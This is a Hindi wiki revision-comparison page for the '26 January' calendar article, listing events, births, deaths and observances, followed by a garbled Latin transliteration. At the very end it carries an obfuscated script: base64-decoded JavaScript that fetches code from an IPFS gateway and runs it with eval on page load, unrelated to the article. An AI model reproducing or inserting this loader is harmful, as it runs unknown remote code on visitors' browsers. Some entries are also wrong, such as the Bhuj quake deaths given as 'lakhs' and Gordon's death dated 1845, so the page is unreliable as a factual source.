Difference between revisions of "26 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(43 intermediate revisions by 11 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 26 जनवरी [[वर्ष]] का 26 वाँ दिन है। साल मे अभी और 339 दिन शेष हैं। ([[लीप वर्ष]] में 340 दिन)
+
[[ग्रेगोरी कैलंडर]] के अनुसार 26 जनवरी [[वर्ष]] का 26 वाँ दिन है। साल में अभी और 339 दिन शेष हैं। ([[लीप वर्ष]] में 340 दिन)
  
 
==26 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==26 जनवरी की महत्त्वपूर्ण घटनाएँ==
* [[1930]]- भारत में पहली बार स्वराज दिवस मनाया गया।
+
* [[2010]]-  
* [[1931]]- सविनय अवज्ञा आंदोलन के दौरान ब्रिटिश सरकार से बातचीत के लिए महात्मा गांधी रिहा किये गए।
+
** [[भारत]] ने मीरपुर में [[बांग्लादेश]] से दूसरा टेस्ट 10 विकेट से जीतते हुए सीरीज़ पर 2-0 से कब्ज़ा कर लिया।
 +
** [[भारत]] की राष्ट्रपति [[प्रतिभा पाटिल]] ने पद्म पुरस्कार पाने वाली 130 व्यक्तियों के नामों की घोषणा की। इनमें रंगमंच जगत् की किंवदंति [[इब्राहिम-अल-क़ाज़ी]] और [[जोहरा सहगल]], मशहूर अदाकार [[रेखा]] और [[आमिर ख़ान]], ऑस्कर विजेता [[ए आर रहमान]] और रसूल पोकुटटी, फार्मूला़ रेसर [[नारायण कार्तिकेयन]], क्रिकेटर [[वीरेंद्र सहवाग]], [[बैडमिंटन]] खिलाड़ी [[साइना नेहवाल]] और क्रिकेटर [[सचिन तेंदुलकर]] के गुरु [[रमाकांत आचरेकर]] शामिल हैं।
 +
* [[2008]]-
 +
**59वें गणतन्त्र दिवस के अवसर पर देश की पहली महिला राष्ट्रपति [[प्रतिभा पाटिल]] ने परेड की सलामी ली। [[एन.आर. नारायणमूर्ति]] को फ्रांस सरकार के सर्वोच्च नागरिक सम्मान 'द ऑफिसर ऑफ द लीजन ऑफ ऑवर' से सम्मानित किया गया।
 +
**ब्रिटेन की एक अदालत ने श्रीलंका के उग्रवादी संगठन लिट्टे के नेता मुरीधरन को नौ महीने की क़ैद की सज़ा सुनाई।
 +
* [[2006]] - फ़िलिस्तीन में हुए चुनावों में हमास ने ज़्यादातर सीटों पर कब्ज़ा किया।
 +
* [[2005]] -
 +
**गणतंत्र दिवस के मौक़े पर [[मणिपुर]] व [[असम]] में बम फटे पर कोई हताहत नहीं हुआ।
 +
**प्रख्यात इतिहासकार विलियम दाएकिन का निधन।
 +
* [[2004]] - ब्रिटेन की महारानी एलिजाबेथ ने माइक्रोसाफ़्ट अध्यक्ष बिल गेट्स को 'नाइट' की उपाधि प्रदान करने की घोषणा की।
 +
* [[2003]] - [[ईरान]] के राष्ट्रपति 'सैयद मोहम्म्द खातमी' गणतंत्र दिवस समारोह में शामिल हुए।
 +
* [[2002]] - [[भारत]] के 53वें '''गणतंत्र दिवस''' पर '''अग्नि-2 मिसाइल''' आकर्षण का केंद्र रही।
 +
* [[2001]]- [[गुजरात]] के [[भुज]] में 7.7 तीव्रता का भीषण भूकंप। इस भूकंप में लाखों लोग मारे गए थे।
 +
* [[2000]] - कोंकण रेलवे परियोजना पूर्ण हुई और प्रथम यात्री गाड़ी चलाई गयी।
 +
* [[1999]] - महिलाओं के यौन शोषण पर विश्व सम्मेलन का ढाका (बांग्लादेश) में आयोजन।
 +
* [[1994]] - रावलपिंडी ([[पाकिस्तान]]) में प्रथम महिला पुलिस थाने का उद्घाटन।
 +
* [[1992]] - मारीटानिया में विपक्ष के प्रदर्शंकारियों पर पुलिस की गोली से अनेक लोग घायल हुए।
 +
* [[1991]] - इराक ने अपने सात विमान ईरान भेजे।
 +
* [[1990]] - रोमानिया के उपराष्ट्रपति डी. माजिलू ने इस्तीफ़ा दिया।
 +
* [[1982]]- पर्यटकों को विलासितापूर्ण रेल यात्रा का आनंद दिलाने के लिए भारतीय रेल ने [[पैलेस ऑन व्हील्स]] सेवा शुरू की।
 +
* [[1981]]- पूर्वोत्तर [[भारत]] में हवाई यातायात सुगम बनाने को ध्यान में रखते हुए हवाई सेवा '''वायुदूत''' प्रारम्भ हुई।
 +
* [[1972]]- युद्ध में शहीद सैनिकों की याद में दिल्ली के [[इंडिया गेट]] पर [[अमर जवान ज्योति|'अमर जवान राष्ट्रीय स्मारक']] की स्थापना की गयी।
 +
* [[1963]] - [[मोर]] के अद्भुत सौंदर्य के कारण भारत सरकार ने [[26 जनवरी]] को इसे राष्ट्रीय पक्षी घोषित किया।
 
* [[1950]]-  
 
* [[1950]]-  
** भारत एक संप्रभु लोकतांत्रिक गणराज्य घोषित हुआ और भारत का संविधान लागू हुआ।
+
** [[भारत]] एक संप्रभु लोकतांत्रिक गणराज्य घोषित हुआ और [[भारत]] का संविधान लागू हुआ।
** स्वतंत्र भारत के पहले और अंतिम गवर्नर जनरल चक्रवर्ति राजगोपालाचारी ने अपने पद से त्यागपत्र दिया और डा. राजेंद्र प्रसाद देश के पहले राष्ट्रपति बने।
+
** स्वतंत्र [[भारत]] के पहले और अंतिम गवर्नर जनरल [[चक्रवर्ती राजगोपालाचारी]] ने अपने पद से त्यागपत्र दिया और [[डॉ. राजेंद्र प्रसाद]] देश के पहले राष्ट्रपति बने।
** उत्तर प्रदेश के सारनाथ स्थित अशोक स्तंभ के शेरों को राष्ट्रीय प्रतीक की मान्यता मिली।
+
** उत्तर प्रदेश के [[सारनाथ]] स्थित [[अशोक स्तंभ]] के शेरों को राष्ट्रीय प्रतीक की मान्यता मिली।
** वर्ष 1937 में गठित भारतीय संघीय न्यायालय का नाम सर्वोच्च न्यायालय कर दिया गया
+
** वर्ष 1937 में गठित [[भारतीय संघीय न्यायालय]] ('फैडेरल कोर्ट ऑफ इंडिया') का नाम [[सर्वोच्च न्यायालय]] ('सुप्रीम कोर्ट ऑफ इंडिया') कर दिया गया
** भारत का युद्ध पोत एचएमआईएस दिल्ली आईएनएस दिल्ली के रूप में बदल दिया गया।
+
** [[भारत]] का युद्ध पोत एच.एम.आई.एस. [[दिल्ली]] आई.एन.एस. दिल्ली के रूप में बदल दिया गया।
* [[1972]]- युध्द में शहीद सैनिकों की याद में दिल्ली के इंडिया गेट पर अमर जवान योति स्थापित।
+
* [[1934]] - [[जर्मनी]] और पौलैंड के बीच दस [[वर्ष|वर्षीय]] अनाक्रमण संधि हुई।
* [[1981]]- पूर्वोत्तर भारत में हवाई यातायात सुगम बनाने को ध्यान में रखते हुए हवाई सेवा ..वायुदूत.. शुरू।
+
* [[1931]] -  
* [[1982]]- पर्यटकों को विलासितापूर्ण रेल यात्रा का आनंद दिलाने के लिए भारतीय रेल ने ..पैलेस आन व्हील्स सेवा शुरू की।
+
**हंगरी और ऑस्ट्रिया ने 'शांति संधि' पर हस्ताक्षर किये।
* [[2001]]- गुजरात के भुज में 7.7 तीव्रता का भीषण भूकंप। इस भूकंप में लाखों लोग मारे गए थे।
+
**'[[सविनय अवज्ञा आंदोलन]]' के दौरान ब्रिटिश सरकार से बातचीत के लिए [[महात्मा गांधी]] रिहा किये गए।
* [[2010]]-  
+
* [[1930]]- ब्रिटिश शासन के अंतर्गत [[भारत]] में पहली बार '''स्वराज दिवस''' मनाया गया।
** भारत ने मीरपुर में बांग्लादेश से दूसरा टेस्ट 10 विकेट से जीतते हुए सीरीज़ पर 2-0 से कब्जा कर लिया।
+
* 1845 - ब्रिटिश जनरल चार्ल्स गार्डन सूडान में मारे गये।
** भारत की राष्ट्रपति प्रतिभा पाटिल ने पद्म पुरस्कार पाने वाली 130 व्यक्तियों के नामों की घोषणा की। इनमें रंगमंच जगत की किंवदंति इब्राहिम अल्काजी और जोहरा सहगल, मशहूर अदाकार रेखा और आमिर खान, ऑस्कर विजेता ए़ आर रहमान और रसूल पोकुटटी, फार्मूला़ रेसर नारायण कार्तिकेयन, क्रिकेटर वीरेंद्र सहवाग, बैडमिंटन खिलाड़ी साइना नेहवाल और क्रिकेटर सचिन तेंदुलकर के गुरु रमाकांत आचरेकर शामिल हैं।
+
* 1841 - हांगकांग ब्रिटिश कब्जे में चला गया।
 +
* 1666 - [[फ्रांस]] ने [[इंग्लैड]] के ख़िलाफ़ युद्ध की घोषणा की।
 +
* 1556 - [[हुमायूँ|मुग़ल सम्राट हमायुँ]] की मृत्यु।
  
 
==26 जनवरी को जन्मे व्यक्ति==
 
==26 जनवरी को जन्मे व्यक्ति==
 +
* [[1967]] - [[प्रदीप सोमासुंदरन]], भारतीय पार्श्वगायक।
 +
* [[1937]] - [[आचार्य चंदना]] - [[जैन धर्म]] की आचार्य हैं।
 +
* [[1923]] - [[देवनाथ पाण्डेय 'रसाल']] - प्रसिद्ध कवि।
 +
* [[1915]] - [[रानी गाइदिनल्यू]] - भारतीय महिला स्वतंत्रता सेनानी।
 +
* [[1906]] - [[सत्यवती देवी]] - साम्यवादी महिला एवं स्वतंत्रता सेनानी थीं।
  
 
==26 जनवरी को हुए निधन==
 
==26 जनवरी को हुए निधन==
* [[1556]]-हूमायु, मुगल बादशाह
+
* [[2015]] - [[आर. के. लक्ष्मण]] मशहूर कार्टूनिस्ट।
 +
* [[2012]] - [[करतार सिंह दुग्गल]] - [[पंजाबी]], [[हिंदी]] और [[उर्दू]] भाषाओं में लिखने वाले प्रसिद्ध साहित्यकारक थे।
 +
* [[2012]] - [[एम. ओ. एच. फ़ारूक]] - [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ थे।
 +
* [[1968]] - [[माधव श्रीहरि अणे]] - [[भारत]] की आज़ादी के लिए संघर्ष करने वाले स्वतंत्रता सेनानियों में से एक।
 +
* [[1954]] - [[मानवेन्द्र नाथ राय]] - वर्तमान [[शताब्दी]] के भारतीय दार्शनिकों में क्रान्तिकारी विचारक तथा मानवतावाद के प्रबल समर्थक।
 +
* 1823 - [[एडवर्ड जेनर]] - प्रसिद्ध कायचिकित्सक।
  
 
==26 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==26 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* [[गणतंत्र दिवस]]
 +
* अंतर्राष्ट्रीय सीमा शुल्क दिवस।
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}

Latest revision as of 13:03, 3 June 2022


gregori kailandar ke anusar 26 janavari varsh ka 26 vaan din hai. sal mean abhi aur 339 din shesh haian. (lip varsh mean 340 din)

26 janavari ki mahattvapoorn ghatanaean

  • 2010-
  • 2008-
    • 59vean ganatantr divas ke avasar par desh ki pahali mahila rashtrapati pratibha patil ne pared ki salami li. en.ar. narayanamoorti ko phraans sarakar ke sarvochch nagarik samman 'd aauphisar aauph d lijan aauph aauvar' se sammanit kiya gaya.
    • briten ki ek adalat ne shrilanka ke ugravadi sangathan litte ke neta muridharan ko nau mahine ki qaid ki saza sunaee.
  • 2006 - filistin mean hue chunavoan mean hamas ne zyadatar sitoan par kabza kiya.
  • 2005 -
    • ganatantr divas ke mauqe par manipur v asam mean bam phate par koee hatahat nahian hua.
    • prakhyat itihasakar viliyam daekin ka nidhan.
  • 2004 - briten ki maharani elijabeth ne maikrosaft adhyaksh bil gets ko 'nait' ki upadhi pradan karane ki ghoshana ki.
  • 2003 - eeran ke rashtrapati 'saiyad mohammd khatami' ganatantr divas samaroh mean shamil hue.
  • 2002 - bharat ke 53vean ganatantr divas par agni-2 misail akarshan ka keandr rahi.
  • 2001- gujarat ke bhuj mean 7.7 tivrata ka bhishan bhookanp. is bhookanp mean lakhoan log mare ge the.
  • 2000 - koankan relave pariyojana poorn huee aur pratham yatri ga di chalaee gayi.
  • 1999 - mahilaoan ke yaun shoshan par vishv sammelan ka dhaka (baangladesh) mean ayojan.
  • 1994 - ravalapiandi (pakistan) mean pratham mahila pulis thane ka udghatan.
  • 1992 - maritaniya mean vipaksh ke pradarshankariyoan par pulis ki goli se anek log ghayal hue.
  • 1991 - irak ne apane sat viman eeran bheje.
  • 1990 - romaniya ke uparashtrapati di. majiloo ne istifa diya.
  • 1982- paryatakoan ko vilasitapoorn rel yatra ka anand dilane ke lie bharatiy rel ne pailes aaun vhils seva shuroo ki.
  • 1981- poorvottar bharat mean havaee yatayat sugam banane ko dhyan mean rakhate hue havaee seva vayudoot prarambh huee.
  • 1972- yuddh mean shahid sainikoan ki yad mean dilli ke iandiya get par 'amar javan rashtriy smarak' ki sthapana ki gayi.
  • 1963 - mor ke adbhut sauandary ke karan bharat sarakar ne 26 janavari ko ise rashtriy pakshi ghoshit kiya.
  • 1950-
  • 1934 - jarmani aur paulaiand ke bich das varshiy anakraman sandhi huee.
  • 1931 -
  • 1930- british shasan ke aantargat bharat mean pahali bar svaraj divas manaya gaya.
  • 1845 - british janaral charls gardan soodan mean mare gaye.
  • 1841 - haangakaang british kabje mean chala gaya.
  • 1666 - phraans ne ianglaid ke khilaf yuddh ki ghoshana ki.
  • 1556 - mugal samrat hamayuan ki mrityu.

26 janavari ko janme vyakti

26 janavari ko hue nidhan

26 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>